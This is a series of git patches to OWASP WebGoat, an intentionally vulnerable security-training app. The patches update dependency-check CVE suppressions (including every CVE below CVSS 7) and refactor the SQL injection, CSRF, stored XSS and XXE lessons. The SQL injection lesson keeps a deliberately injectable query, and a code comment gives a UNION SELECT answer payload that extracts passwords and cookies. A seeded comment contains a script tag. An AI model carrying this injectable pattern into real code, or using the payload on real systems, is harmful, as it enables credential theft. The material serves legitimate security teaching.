@@ -1,42 +1,77 @@
 <?xml version="1.0" encoding="UTF-8"?>
 <suppressions xmlns="https://jeremylong.github.io/DependencyCheck/dependency-suppression.1.3.xsd">
-    <suppress base="true">
+    <suppress>
         <notes><![CDATA[
-        This suppresses false positives identified on spring framework.
+        This suppresses all CVE entries that have a score below CVSS 7.
         ]]></notes>
-        <cpe>cpe:/a:pivotal_software:spring_framework</cpe>
-        <cve>CVE-2020-5398</cve>
+        <cvssBelow>7</cvssBelow>
     </suppress>
-    <suppress base="true">
+    <suppress>
         <notes><![CDATA[
-        This suppresses false positives identified on spring framework.
+        file name: spring-tx-5.3.21.jar
         ]]></notes>
-        <cpe>cpe:/a:redhat:undertow</cpe>
-        <cve>CVE-2019-14888</cve>
-    </suppress>
-    <suppress base="true">
+        <sha1>13f4f564024d2f85502c151942307c3ca851a4f7</sha1>
+        <cve>CVE-2016-1000027</cve>
+     </suppress>
+     <suppress>
         <notes><![CDATA[
-        This suppresses false positives identified on spring framework.
+        file name: spring-core-5.3.21.jar
         ]]></notes>
-        <cpe>cpe:/a:pivotal_software:spring_security</cpe>
-        <cve>CVE-2018-1258</cve>
-    </suppress>
-    <suppress base="true">
+        <packageUrl regex="true">^pkg:maven/org\.springframework/spring\-core@.*$</packageUrl>
+        <cve>CVE-2016-1000027</cve>
+     </suppress>
+     <suppress>
+        <notes><![CDATA[
+        file name: spring-aop-5.3.21.jar
+        ]]></notes>
+        <packageUrl regex="true">^pkg:maven/org\.springframework/spring\-aop@.*$</packageUrl>
+        <cve>CVE-2016-1000027</cve>
+     </suppress>
+     <suppress>
+        <notes><![CDATA[
+        file name: spring-boot-starter-security-2.7.1.jar
+        ]]></notes>
+        <packageUrl regex="true">^pkg:maven/org\.springframework\.boot/spring\-boot\-starter\-security@.*$</packageUrl>
+        <cve>CVE-2022-22978</cve>
+     </suppress>
+     <suppress>
+        <notes><![CDATA[
+        file name: jruby-stdlib-9.2.20.1.jar: jopenssl.jar (shaded: rubygems:jruby-openssl:0.11.0)
+        ]]></notes>
+        <packageUrl regex="true">^pkg:maven/rubygems/jruby\-openssl@.*$</packageUrl>
         <cpe>cpe:/a:jruby:jruby</cpe>
-        <cve>CVE-2018-1000613</cve>
-        <cve>CVE-2018-1000180</cve>
-        <cve>CVE-2017-18640</cve>
-        <cve>CVE-2011-4838</cve>
-    </suppress>
-    <suppress base="true"><!-- vulnerable components lesson -->
+        <cpe>cpe:/a:openssl:openssl</cpe>
+     </suppress>
+    <suppress>
+        <notes><![CDATA[
+        file name: xstream-1.4.5.jar
+        ]]></notes>
+        <packageUrl regex="true">^pkg:maven/com\.thoughtworks\.xstream/xstream@.*$</packageUrl>
         <cpe>cpe:/a:xstream_project:xstream</cpe>
-        <cve>CVE-2017-7957</cve>
-        <cve>CVE-2016-3674</cve>
-        <cve>CVE-2020-26217</cve>
-        <cve>CVE-2020-26258</cve>
-    </suppress>
-    <suppress base="true"><!-- webgoat-server -->
-        <cpe>cpe:/a:postgresql:postgresql</cpe>
-        <cve>CVE-2018-10936</cve>
-    </suppress>
+        <vulnerabilityName>CVE-2013-7285</vulnerabilityName>
+        <vulnerabilityName>CVE-2016-3674</vulnerabilityName>
+        <vulnerabilityName>CVE-2017-7957</vulnerabilityName>
+        <vulnerabilityName>CVE-2020-26217</vulnerabilityName>
+        <vulnerabilityName>CVE-2020-26258</vulnerabilityName>
+        <vulnerabilityName>CVE-2020-26259</vulnerabilityName>
+        <vulnerabilityName>CVE-2021-21341</vulnerabilityName>
+        <vulnerabilityName>CVE-2021-21342</vulnerabilityName>
+        <vulnerabilityName>CVE-2021-21343</vulnerabilityName>
+        <vulnerabilityName>CVE-2021-21344</vulnerabilityName>
+        <vulnerabilityName>CVE-2021-21345</vulnerabilityName>
+        <vulnerabilityName>CVE-2021-21346</vulnerabilityName>
+        <vulnerabilityName>CVE-2021-21347</vulnerabilityName>
+        <vulnerabilityName>CVE-2021-21348</vulnerabilityName>
+        <vulnerabilityName>CVE-2021-21349</vulnerabilityName>
+        <vulnerabilityName>CVE-2021-21350</vulnerabilityName>
+        <vulnerabilityName>CVE-2021-21351</vulnerabilityName>
+        <vulnerabilityName>CVE-2021-43859</vulnerabilityName>
+     </suppress>
+     <suppress>
+        <notes><![CDATA[
+        file name: spring-jcl-5.3.21.jar
+        ]]></notes>
+        <packageUrl regex="true">^pkg:maven/org\.springframework/spring\-.*@.*$</packageUrl>
+        <cve>CVE-2016-1000027</cve>
+     </suppress>
 </suppressions>
diff --git a/pom.xml b/pom.xml
index a56818b80..d9e0f2e80 100644
--- a/pom.xml
+++ b/pom.xml
@@ -119,7 +119,7 @@
         <webwolf.port>9090</webwolf.port>
 
         <!-- Shared properties with plugins and version numbers across submodules-->
-        <asciidoctorj.version>2.5.2</asciidoctorj.version>
+        <asciidoctorj.version>2.5.3</asciidoctorj.version>
         <bootstrap.version>3.3.7</bootstrap.version>
         <cglib.version>2.2</cglib.version> <!-- do not update necessary for lesson -->
         <checkstyle.version>3.1.2</checkstyle.version>
@@ -337,8 +337,8 @@
                         <version>6.5.1</version>
                         <configuration>
                             <failBuildOnCVSS>7</failBuildOnCVSS>
-                            <skipProvidedScope>true</skipProvidedScope>
-                            <skipRuntimeScope>true</skipRuntimeScope>
+                            <skipProvidedScope>false</skipProvidedScope>
+                            <skipRuntimeScope>false</skipRuntimeScope>
                             <suppressionFiles>
                                 <!--suppress UnresolvedMavenProperty -->
                                 <suppressionFile>
@@ -536,14 +536,7 @@
                             <groupId>org.asciidoctor</groupId>
                             <artifactId>asciidoctorj</artifactId>
                         </dependency>
-                        <dependency>
-                            <groupId>org.jruby</groupId>
-                            <artifactId>jruby-complete</artifactId>
-                        </dependency>
                     </requiresUnpack>
-                    <jvmArguments>
-                        <!-- -Xdebug -Xrunjdwp:transport=dt_socket,server=y,suspend=y,address=8000-->
-                    </jvmArguments>
                 </configuration>
             </plugin>
             <plugin>
diff --git a/src/main/java/org/owasp/webgoat/lessons/sql_injection/advanced/SqlInjectionLesson6a.java b/src/main/java/org/owasp/webgoat/lessons/sql_injection/advanced/SqlInjectionLesson6a.java
index 943d44570..38a02f2b1 100644
--- a/src/main/java/org/owasp/webgoat/lessons/sql_injection/advanced/SqlInjectionLesson6a.java
+++ b/src/main/java/org/owasp/webgoat/lessons/sql_injection/advanced/SqlInjectionLesson6a.java
@@ -41,15 +41,15 @@ import java.sql.*;
 public class SqlInjectionLesson6a extends AssignmentEndpoint {
 
     private final LessonDataSource dataSource;
-
+    private static final String YOUR_QUERY_WAS = "<br> Your query was: ";
     public SqlInjectionLesson6a(LessonDataSource dataSource) {
         this.dataSource = dataSource;
     }
 
     @PostMapping("/SqlInjectionAdvanced/attack6a")
     @ResponseBody
-    public AttackResult completed(@RequestParam String userid_6a) {
-        return injectableQuery(userid_6a);
+    public AttackResult completed(@RequestParam(value="userid_6a")  String userId) {
+        return injectableQuery(userId);
         // The answer: Smith' union select userid,user_name, password,cookie,cookie, cookie,userid from user_system_data --
     }
 
@@ -66,7 +66,7 @@ public class SqlInjectionLesson6a extends AssignmentEndpoint {
                     ResultSet.CONCUR_READ_ONLY)) {
                 ResultSet results = statement.executeQuery(query);
 
-                if ((results != null) && (results.first())) {
+                if ((results != null) && results.first()) {
                     ResultSetMetaData resultsMetaData = results.getMetaData();
                     StringBuilder output = new StringBuilder();
 
@@ -83,17 +83,16 @@ public class SqlInjectionLesson6a extends AssignmentEndpoint {
                         output.append(appendingWhenSucceded);
                         return success(this).feedback("sql-injection.advanced.6a.success").feedbackArgs(output.toString()).output(" Your query was: " + query).build();
                     } else {
-                        return failed(this).output(output.toString() + "<br> Your query was: " + query).build();
+                        return failed(this).output(output.toString() + YOUR_QUERY_WAS + query).build();
                     }
                 } else {
-                    return failed(this).feedback("sql-injection.advanced.6a.no.results").output(" Your query was: " + query).build();
+                    return failed(this).feedback("sql-injection.advanced.6a.no.results").output(YOUR_QUERY_WAS + query).build();
                 }
             } catch (SQLException sqle) {
-                return failed(this).output(sqle.getMessage() + "<br> Your query was: " + query).build();
+                return failed(this).output(sqle.getMessage() + YOUR_QUERY_WAS + query).build();
             }
         } catch (Exception e) {
-            e.printStackTrace();
-            return failed(this).output(this.getClass().getName() + " : " + e.getMessage() + "<br> Your query was: " + query).build();
+            return failed(this).output(this.getClass().getName() + " : " + e.getMessage() + YOUR_QUERY_WAS + query).build();
         }
     }
 }
diff --git a/src/test/java/org/owasp/webgoat/lessons/sql_injection/introduction/SqlInjectionLesson6aTest.java b/src/test/java/org/owasp/webgoat/lessons/sql_injection/introduction/SqlInjectionLesson6aTest.java
index 34e13b2bb..d3c2653f1 100644
--- a/src/test/java/org/owasp/webgoat/lessons/sql_injection/introduction/SqlInjectionLesson6aTest.java
+++ b/src/test/java/org/owasp/webgoat/lessons/sql_injection/introduction/SqlInjectionLesson6aTest.java
@@ -23,9 +23,7 @@
 package org.owasp.webgoat.lessons.sql_injection.introduction;
 
 import org.junit.jupiter.api.Test;
-import org.junit.jupiter.api.extension.ExtendWith;
 import org.owasp.webgoat.lessons.sql_injection.SqlLessonTest;
-import org.springframework.test.context.junit.jupiter.SpringExtension;
 import org.springframework.test.web.servlet.request.MockMvcRequestBuilders;
 
 import static org.hamcrest.Matchers.containsString;

From b47568ed697726072f5cbe86a38a88ab6550cc25 Mon Sep 17 00:00:00 2001
From: "dependabot[bot]" <49699333+dependabot[bot]@users.noreply.github.com>
Date: Thu, 14 Jul 2022 09:03:51 +0200
Subject: [PATCH 154/227] Bump actions/cache from 3.0.4 to 3.0.5 (#1291)

Bumps [actions/cache](https://github.com/actions/cache) from 3.0.4 to 3.0.5.
- [Release notes](https://github.com/actions/cache/releases)
- [Changelog](https://github.com/actions/cache/blob/main/RELEASES.md)
- [Commits](https://github.com/actions/cache/compare/v3.0.4...v3.0.5)

---
updated-dependencies:
- dependency-name: actions/cache
  dependency-type: direct:production
  update-type: version-update:semver-patch
...

Signed-off-by: dependabot[bot] <support@github.com>

Co-authored-by: dependabot[bot] <49699333+dependabot[bot]@users.noreply.github.com>
---
 .github/workflows/build.yml   | 4 ++--
 .github/workflows/release.yml | 2 +-
 2 files changed, 3 insertions(+), 3 deletions(-)

diff --git a/.github/workflows/build.yml b/.github/workflows/build.yml
index 8ae51e1ea..fbfeb40ad 100644
--- a/.github/workflows/build.yml
+++ b/.github/workflows/build.yml
@@ -42,7 +42,7 @@ jobs:
           java-version: 17
           architecture: x64
       - name: Cache Maven packages
-        uses: actions/cache@v3.0.4
+        uses: actions/cache@v3.0.5
         with:
           path: ~/.m2
           key: ${{ runner.os }}-m2-${{ hashFiles('**/pom.xml') }}
@@ -63,7 +63,7 @@ jobs:
               java-version: 17
               architecture: x64
         - name: Cache Maven packages
-          uses: actions/cache@v3.0.4
+          uses: actions/cache@v3.0.5
           with:
               path: ~/.m2
               key: ubuntu-latest-m2-${{ hashFiles('**/pom.xml') }}
diff --git a/.github/workflows/release.yml b/.github/workflows/release.yml
index 5cc6c3868..a8d81086c 100644
--- a/.github/workflows/release.yml
+++ b/.github/workflows/release.yml
@@ -25,7 +25,7 @@ jobs:
           architecture: x64
 
       - name: Cache Maven packages
-        uses: actions/cache@v3.0.4
+        uses: actions/cache@v3.0.5
         with:
           path: ~/.m2
           key: ${{ runner.os }}-m2-${{ hashFiles('**/pom.xml') }}

From 16af4272a5a35823d09e2312cff120d147e9a51e Mon Sep 17 00:00:00 2001
From: =?UTF-8?q?Ren=C3=A9=20Zubcevic?= <rene@zubcevic.com>
Date: Thu, 14 Jul 2022 09:11:06 +0200
Subject: [PATCH 155/227] joda time refactored some dep fix (#1292)

---
 pom.xml                                       | 25 +++++++++++++++++++
 .../webgoat/lessons/csrf/ForgedReviews.java   | 17 ++++++-------
 .../lessons/xss/stored/StoredXssComments.java | 17 ++++++-------
 .../webgoat/lessons/xxe/CommentsCache.java    | 15 ++++++-----
 4 files changed, 48 insertions(+), 26 deletions(-)

diff --git a/pom.xml b/pom.xml
index d9e0f2e80..d9caf9678 100644
--- a/pom.xml
+++ b/pom.xml
@@ -149,6 +149,13 @@
 
     <dependencyManagement>
         <dependencies>
+
+            <dependency>
+                <groupId>org.ow2.asm</groupId>
+                <artifactId>asm</artifactId>
+                <version>9.1</version>
+            </dependency>
+
             <dependency>
                 <groupId>org.apache.commons</groupId>
                 <artifactId>commons-exec</artifactId>
@@ -230,6 +237,16 @@
                 <artifactId>webdrivermanager</artifactId>
                 <version>${webdriver.version}</version>
             </dependency>
+            <dependency>
+                <groupId>org.apache.commons</groupId>
+                <artifactId>commons-compress</artifactId>
+                <version>1.21</version>
+            </dependency>
+            <dependency>
+                <groupId>org.jruby</groupId>
+                <artifactId>jruby</artifactId>
+                <version>9.3.6.0</version>
+            </dependency>
         </dependencies>
     </dependencyManagement>
 
@@ -632,6 +649,14 @@
                     </execution>
                 </executions>
             </plugin>
+            <plugin>
+                <groupId>org.apache.maven.plugins</groupId>
+                <artifactId>maven-compiler-plugin</artifactId>
+                <configuration>
+                    <source>17</source>
+                    <target>17</target>
+                </configuration>
+            </plugin>
         </plugins>
     </build>
 
diff --git a/src/main/java/org/owasp/webgoat/lessons/csrf/ForgedReviews.java b/src/main/java/org/owasp/webgoat/lessons/csrf/ForgedReviews.java
index d91b906c5..b65691ac2 100644
--- a/src/main/java/org/owasp/webgoat/lessons/csrf/ForgedReviews.java
+++ b/src/main/java/org/owasp/webgoat/lessons/csrf/ForgedReviews.java
@@ -23,9 +23,6 @@
 package org.owasp.webgoat.lessons.csrf;
 
 import com.google.common.collect.Lists;
-import org.joda.time.DateTime;
-import org.joda.time.format.DateTimeFormat;
-import org.joda.time.format.DateTimeFormatter;
 import org.owasp.webgoat.container.assignments.AssignmentEndpoint;
 import org.owasp.webgoat.container.assignments.AssignmentHints;
 import org.owasp.webgoat.container.assignments.AttackResult;
@@ -38,6 +35,8 @@ import org.springframework.web.bind.annotation.ResponseBody;
 import org.springframework.web.bind.annotation.RestController;
 
 import javax.servlet.http.HttpServletRequest;
+import java.time.LocalDateTime;
+import java.time.format.DateTimeFormatter;
 import java.util.ArrayList;
 import java.util.Collection;
 import java.util.HashMap;
@@ -52,7 +51,7 @@ public class ForgedReviews extends AssignmentEndpoint {
 
     @Autowired
     private WebSession webSession;
-    private static DateTimeFormatter fmt = DateTimeFormat.forPattern("yyyy-MM-dd, HH:mm:ss");
+    private static DateTimeFormatter fmt = DateTimeFormatter.ofPattern("yyyy-MM-dd, HH:mm:ss");
 
     private static final Map<String, List<Review>> userReviews = new HashMap<>();
     private static final List<Review> REVIEWS = new ArrayList<>();
@@ -60,10 +59,10 @@ public class ForgedReviews extends AssignmentEndpoint {
 
 
     static {
-        REVIEWS.add(new Review("secUriTy", DateTime.now().toString(fmt), "This is like swiss cheese", 0));
-        REVIEWS.add(new Review("webgoat", DateTime.now().toString(fmt), "It works, sorta", 2));
-        REVIEWS.add(new Review("guest", DateTime.now().toString(fmt), "Best, App, Ever", 5));
-        REVIEWS.add(new Review("guest", DateTime.now().toString(fmt), "This app is so insecure, I didn't even post this review, can you pull that off too?", 1));
+        REVIEWS.add(new Review("secUriTy", LocalDateTime.now().format(fmt), "This is like swiss cheese", 0));
+        REVIEWS.add(new Review("webgoat", LocalDateTime.now().format(fmt), "It works, sorta", 2));
+        REVIEWS.add(new Review("guest", LocalDateTime.now().format(fmt), "Best, App, Ever", 5));
+        REVIEWS.add(new Review("guest", LocalDateTime.now().format(fmt), "This app is so insecure, I didn't even post this review, can you pull that off too?", 1));
     }
 
     @GetMapping(path = "/csrf/review", produces = MediaType.APPLICATION_JSON_VALUE, consumes = ALL_VALUE)
@@ -89,7 +88,7 @@ public class ForgedReviews extends AssignmentEndpoint {
 
         Review review = new Review();
         review.setText(reviewText);
-        review.setDateTime(DateTime.now().toString(fmt));
+        review.setDateTime(LocalDateTime.now().format(fmt));
         review.setUser(webSession.getUserName());
         review.setStars(stars);
         var reviews = userReviews.getOrDefault(webSession.getUserName(), new ArrayList<>());
diff --git a/src/main/java/org/owasp/webgoat/lessons/xss/stored/StoredXssComments.java b/src/main/java/org/owasp/webgoat/lessons/xss/stored/StoredXssComments.java
index 36e1bdc44..b82a87231 100644
--- a/src/main/java/org/owasp/webgoat/lessons/xss/stored/StoredXssComments.java
+++ b/src/main/java/org/owasp/webgoat/lessons/xss/stored/StoredXssComments.java
@@ -24,9 +24,6 @@ package org.owasp.webgoat.lessons.xss.stored;
 
 import com.fasterxml.jackson.databind.ObjectMapper;
 import com.google.common.collect.Lists;
-import org.joda.time.DateTime;
-import org.joda.time.format.DateTimeFormat;
-import org.joda.time.format.DateTimeFormatter;
 import org.owasp.webgoat.container.assignments.AssignmentEndpoint;
 import org.owasp.webgoat.container.assignments.AttackResult;
 import org.owasp.webgoat.container.session.WebSession;
@@ -40,6 +37,8 @@ import org.springframework.web.bind.annotation.ResponseBody;
 import org.springframework.web.bind.annotation.RestController;
 
 import java.io.IOException;
+import java.time.LocalDateTime;
+import java.time.format.DateTimeFormatter;
 import java.util.ArrayList;
 import java.util.Collection;
 import java.util.Collections;
@@ -55,7 +54,7 @@ public class StoredXssComments extends AssignmentEndpoint {
 
     @Autowired
     private WebSession webSession;
-    private static DateTimeFormatter fmt = DateTimeFormat.forPattern("yyyy-MM-dd, HH:mm:ss");
+    private static DateTimeFormatter fmt = DateTimeFormatter.ofPattern("yyyy-MM-dd, HH:mm:ss");
 
     private static final Map<String, List<Comment>> userComments = new HashMap<>();
     private static final List<Comment> comments = new ArrayList<>();
@@ -63,10 +62,10 @@ public class StoredXssComments extends AssignmentEndpoint {
 
 
     static {
-        comments.add(new Comment("secUriTy", DateTime.now().toString(fmt), "<script>console.warn('unit test me')</script>Comment for Unit Testing"));
-        comments.add(new Comment("webgoat", DateTime.now().toString(fmt), "This comment is safe"));
-        comments.add(new Comment("guest", DateTime.now().toString(fmt), "This one is safe too."));
-        comments.add(new Comment("guest", DateTime.now().toString(fmt), "Can you post a comment, calling webgoat.customjs.phoneHome() ?"));
+        comments.add(new Comment("secUriTy", LocalDateTime.now().format(fmt), "<script>console.warn('unit test me')</script>Comment for Unit Testing"));
+        comments.add(new Comment("webgoat", LocalDateTime.now().format(fmt), "This comment is safe"));
+        comments.add(new Comment("guest", LocalDateTime.now().format(fmt), "This one is safe too."));
+        comments.add(new Comment("guest", LocalDateTime.now().format(fmt), "Can you post a comment, calling webgoat.customjs.phoneHome() ?"));
     }
 
     //TODO This assignment seems not to be in use in the UI
@@ -90,7 +89,7 @@ public class StoredXssComments extends AssignmentEndpoint {
         Comment comment = parseJson(commentStr);
 
         List<Comment> comments = userComments.getOrDefault(webSession.getUserName(), new ArrayList<>());
-        comment.setDateTime(DateTime.now().toString(fmt));
+        comment.setDateTime(LocalDateTime.now().format(fmt));
         comment.setUser(webSession.getUserName());
 
         comments.add(comment);
diff --git a/src/main/java/org/owasp/webgoat/lessons/xxe/CommentsCache.java b/src/main/java/org/owasp/webgoat/lessons/xxe/CommentsCache.java
index 6c7ff32b4..f020228cd 100644
--- a/src/main/java/org/owasp/webgoat/lessons/xxe/CommentsCache.java
+++ b/src/main/java/org/owasp/webgoat/lessons/xxe/CommentsCache.java
@@ -23,9 +23,6 @@
 package org.owasp.webgoat.lessons.xxe;
 
 import com.fasterxml.jackson.databind.ObjectMapper;
-import org.joda.time.DateTime;
-import org.joda.time.format.DateTimeFormat;
-import org.joda.time.format.DateTimeFormatter;
 import org.owasp.webgoat.container.session.WebSession;
 import org.owasp.webgoat.container.users.WebGoatUser;
 import org.springframework.context.annotation.Scope;
@@ -38,6 +35,8 @@ import javax.xml.stream.XMLInputFactory;
 import javax.xml.stream.XMLStreamException;
 import java.io.IOException;
 import java.io.StringReader;
+import java.time.LocalDateTime;
+import java.time.format.DateTimeFormatter;
 import java.util.ArrayList;
 import java.util.Comparator;
 import java.util.HashMap;
@@ -59,7 +58,7 @@ public class CommentsCache {
 
     private static final Comments comments = new Comments();
     private static final Map<WebGoatUser, Comments> userComments = new HashMap<>();
-    private static final DateTimeFormatter fmt = DateTimeFormat.forPattern("yyyy-MM-dd, HH:mm:ss");
+    private static final DateTimeFormatter fmt = DateTimeFormatter.ofPattern("yyyy-MM-dd, HH:mm:ss");
 
     private final WebSession webSession;
 
@@ -69,9 +68,9 @@ public class CommentsCache {
     }
 
     void initDefaultComments() {
-        comments.add(new Comment("webgoat", DateTime.now().toString(fmt), "Silly cat...."));
-        comments.add(new Comment("guest", DateTime.now().toString(fmt), "I think I will use this picture in one of my projects."));
-        comments.add(new Comment("guest", DateTime.now().toString(fmt), "Lol!! :-)."));
+        comments.add(new Comment("webgoat", LocalDateTime.now().format(fmt), "Silly cat...."));
+        comments.add(new Comment("guest", LocalDateTime.now().format(fmt), "I think I will use this picture in one of my projects."));
+        comments.add(new Comment("guest", LocalDateTime.now().format(fmt), "Lol!! :-)."));
     }
 
     protected Comments getComments() {
@@ -116,7 +115,7 @@ public class CommentsCache {
     }
 
     public void addComment(Comment comment, boolean visibleForAllUsers) {
-        comment.setDateTime(DateTime.now().toString(fmt));
+        comment.setDateTime(LocalDateTime.now().format(fmt));
         comment.setUser(webSession.getUserName());
         if (visibleForAllUsers) {
             comments.add(comment);

From 4fc03381a81c52cd6e62a6ec553dc66e9f17cada Mon Sep 17 00:00:00 2001
From: =?UTF-8?q?Ren=C3=A9=20Zubcevic?= <rene@zubcevic.com>
Date: Fri, 15 Jul 2022 08:17:11 +0200
Subject: [PATCH 156/227] Label hint tests (#1293)

* label test

* adjusted it test filter

* label test added
---
 pom.xml                                       |  6 +-
 .../org/owasp/webgoat/LabelAndHintTest.java   | 89 +++++++++++++++++++
 .../resources/i18n/messages_de.properties     |  2 +-
 .../resources/i18n/messages_fr.properties     |  4 +-
 .../resources/i18n/messages_nl.properties     |  6 +-
 .../resources/i18n/messages_ru.properties     |  2 +-
 .../service/LessonMenuServiceTest.java        |  2 +-
 .../ProfileUploadRetrievalTest.java           |  2 +-
 .../xxe/ContentTypeAssignmentTest.java        |  2 +-
 9 files changed, 103 insertions(+), 12 deletions(-)
 create mode 100644 src/it/java/org/owasp/webgoat/LabelAndHintTest.java

diff --git a/pom.xml b/pom.xml
index d9caf9678..66ff1c85b 100644
--- a/pom.xml
+++ b/pom.xml
@@ -293,7 +293,7 @@
                                     <goal>start</goal>
                                 </goals>
                                 <configuration>
-                                    <workingDir></workingDir>
+                                    <workingDir>${project.build.directory}</workingDir>
                                     <arguments>
                                         <argument>java</argument>
                                         <argument>-jar</argument>
@@ -582,7 +582,7 @@
                         <logback.configurationFile>${basedir}/src/test/resources/logback-test.xml</logback.configurationFile>
                     </systemPropertyVariables>
                     <argLine>-Xmx512m -Dwebgoatport=${webgoat.port} -Dwebwolfport=${webwolf.port}</argLine>
-                    <includes>**/*IntegrationTest.java</includes>
+                    <includes>org/owasp/webgoat/*Test</includes>
                 </configuration>
                 <executions>
                     <execution>
@@ -609,6 +609,8 @@
                     </argLine>
                     <excludes>
                         <exclude>**/*IntegrationTest.java</exclude>
+                        <exclude>src/it/java</exclude>
+                        <exclude>org/owasp/webgoat/*Test</exclude>
                     </excludes>
                 </configuration>
             </plugin>
diff --git a/src/it/java/org/owasp/webgoat/LabelAndHintTest.java b/src/it/java/org/owasp/webgoat/LabelAndHintTest.java
new file mode 100644
index 000000000..0724e9475
--- /dev/null
+++ b/src/it/java/org/owasp/webgoat/LabelAndHintTest.java
@@ -0,0 +1,89 @@
+package org.owasp.webgoat;
+
+import io.restassured.RestAssured;
+import io.restassured.http.ContentType;
+import io.restassured.path.json.JsonPath;
+import org.junit.jupiter.api.Assertions;
+import org.junit.jupiter.api.Test;
+
+import java.io.FileInputStream;
+import java.io.InputStream;
+import java.util.Properties;
+
+public class LabelAndHintTest extends IntegrationTest {
+
+
+    @Test
+    public void testSingleLabel() {
+        Assertions.assertTrue(true);
+        JsonPath jsonPath = RestAssured.given()
+                .when()
+                .relaxedHTTPSValidation()
+                .contentType(ContentType.JSON)
+                .header("Accept-Language","en")
+                .cookie("JSESSIONID", getWebGoatCookie())
+                .get(url("service/labels.mvc")).then().statusCode(200).extract().jsonPath();
+
+        Assertions.assertEquals("Try again: but this time enter a value before hitting go.", jsonPath.getString("\'http-basics.close\'"));
+    }
+
+    @Test
+    public void testLabels() {
+
+        Properties propsDefault = getProperties("");
+        System.out.println("Working Directory = " + System.getProperty("user.dir"));
+        checkLang(propsDefault,"nl");
+        checkLang(propsDefault,"de");
+        checkLang(propsDefault,"fr");
+        checkLang(propsDefault,"ru");
+
+    }
+
+    private Properties getProperties(String lang) {
+        Properties prop = null;
+        if (lang == null || lang.equals("")) { lang = ""; } else { lang = "_"+lang; }
+        try (InputStream input = new FileInputStream("src/main/resources/i18n/messages"+lang+".properties")) {
+
+            prop = new Properties();
+            // load a properties file
+            prop.load(input);
+        } catch (Exception e) {
+            e.printStackTrace();
+        }
+        return prop;
+    }
+
+    private void checkLang(Properties propsDefault, String lang) {
+        JsonPath jsonPath = getLabels(lang);
+        Properties propsLang = getProperties(lang);
+
+        for (String key: propsLang.stringPropertyNames()) {
+            if (!propsDefault.containsKey(key)) {
+                System.err.println("key: " + key + " in (" +lang+") is missing from default properties");
+                Assertions.fail();
+            }
+            /*if (!jsonPath.getString("\'"+key+"\'").equals(propsLang.get(key))) {
+                System.out.println("key: " + key + " in (" +lang+") has incorrect translation in label service");
+                System.out.println("actual:"+jsonPath.getString("\'"+key+"\'"));
+                System.out.println("expected: "+propsLang.getProperty(key));
+                System.out.println();
+                //Assertions.fail();
+            }*/
+        }
+    }
+
+    private JsonPath getLabels(String lang) {
+        return RestAssured.given()
+                .when()
+                .relaxedHTTPSValidation()
+                .contentType(ContentType.JSON)
+                .header("Accept-Language",lang)
+                .cookie("JSESSIONID", getWebGoatCookie())
+                //.log().headers()
+                .get(url("service/labels.mvc"))
+                .then()
+                //.log().all()
+                .statusCode(200).extract().jsonPath();
+    }
+
+}
diff --git a/src/main/resources/i18n/messages_de.properties b/src/main/resources/i18n/messages_de.properties
index 152981238..3cb246153 100644
--- a/src/main/resources/i18n/messages_de.properties
+++ b/src/main/resources/i18n/messages_de.properties
@@ -24,7 +24,7 @@
 #
 
 #General
-LessonCompleted=Herzlichen Gl\u00fcckwunsch! Sie haben diese Lektion erfolgreich abgeschlossen.
+lesson.completed=Herzlichen Gl\u00fcckwunsch! Sie haben diese Lektion erfolgreich abgeschlossen.
 RestartLesson=Lektion neu beginnen
 SolutionVideos=L\u00f6sungsvideos
 ErrorGenerating=Fehler beim Generieren von
diff --git a/src/main/resources/i18n/messages_fr.properties b/src/main/resources/i18n/messages_fr.properties
index 340a11bd7..737c207fc 100644
--- a/src/main/resources/i18n/messages_fr.properties
+++ b/src/main/resources/i18n/messages_fr.properties
@@ -24,9 +24,9 @@
 #
 
 #General
-LessonCompleted=F\u00e9licitations. Vous avez termin\u00e9 cette le\u00e7on avec succ\u00e9s.
+lesson.completed=F\u00e9licitations. Vous avez termin\u00e9 cette le\u00e7on avec succ\u00e9s.
 RestartLesson=Recommencer cette le\u00e7on
 SolutionVideos=Solution vid\u00e9os
 ErrorGenerating=Error generating
 InvalidData=Donn\u00e9e invalide
-Go!=Go!
+Go!=Allez le faire!
diff --git a/src/main/resources/i18n/messages_nl.properties b/src/main/resources/i18n/messages_nl.properties
index 2370be9d4..065b566ff 100644
--- a/src/main/resources/i18n/messages_nl.properties
+++ b/src/main/resources/i18n/messages_nl.properties
@@ -22,12 +22,12 @@
 # projects.
 # <p>
 #
-LessonCompleted=Gefeliciteerd, je hebt de les succesvol afgerond.
+lesson.completed=Gefeliciteerd, je hebt de les succesvol afgerond.
 RestartLesson=Herstart de les
 SolutionVideos=Video oplossingen
 ErrorGenerating=Fout opgetreden tijdens generatie
 InvalidData=Ongeldige invoer
-Go!=Go!
+Go!=Ga snel aan de slag!
 password=Wachtwoord
 username=Gebruikersnaam
 logged_out=Je bent succesvol uitgelogd.
@@ -46,4 +46,4 @@ contact=Neem contact met ons op
 show.hints=Toon hints
 lesson.overview=Overzicht les
 reset.lesson=Herstart les
-sign.in=Log in
\ No newline at end of file
+sign.in=Log in
diff --git a/src/main/resources/i18n/messages_ru.properties b/src/main/resources/i18n/messages_ru.properties
index 436a81ee5..e24c2b8f4 100644
--- a/src/main/resources/i18n/messages_ru.properties
+++ b/src/main/resources/i18n/messages_ru.properties
@@ -24,7 +24,7 @@
 #
 
 #General
-LessonCompleted=\u041f\u043e\u0437\u0434\u0440\u0430\u0432\u043b\u044f\u044e. \u0412\u044b \u043f\u043e\u043b\u043d\u043e\u0441\u0442\u044c\u044e \u043f\u0440\u043e\u0448\u043b\u0438 \u0434\u0430\u043d\u043d\u044b\u0439 \u0443\u0440\u043e\u043a.
+lesson.completed=\u041f\u043e\u0437\u0434\u0440\u0430\u0432\u043b\u044f\u044e. \u0412\u044b \u043f\u043e\u043b\u043d\u043e\u0441\u0442\u044c\u044e \u043f\u0440\u043e\u0448\u043b\u0438 \u0434\u0430\u043d\u043d\u044b\u0439 \u0443\u0440\u043e\u043a.
 RestartLesson=\u041d\u0430\u0447\u0430\u043b\u044c \u0441\u043d\u0430\u0447\u0430\u043b\u0430
 SolutionVideos=\u0412\u0438\u0434\u0435\u043e \u0441 \u0440\u0435\u0448\u0435\u043d\u0438\u0435\u043c
 ErrorGenerating=\u041f\u0440\u043e\u0438\u0437\u043e\u0448\u043b\u0430 \u043e\u0448\u0438\u0431\u043a\u0430
diff --git a/src/test/java/org/owasp/webgoat/container/service/LessonMenuServiceTest.java b/src/test/java/org/owasp/webgoat/container/service/LessonMenuServiceTest.java
index d889e2665..5f7e1e751 100644
--- a/src/test/java/org/owasp/webgoat/container/service/LessonMenuServiceTest.java
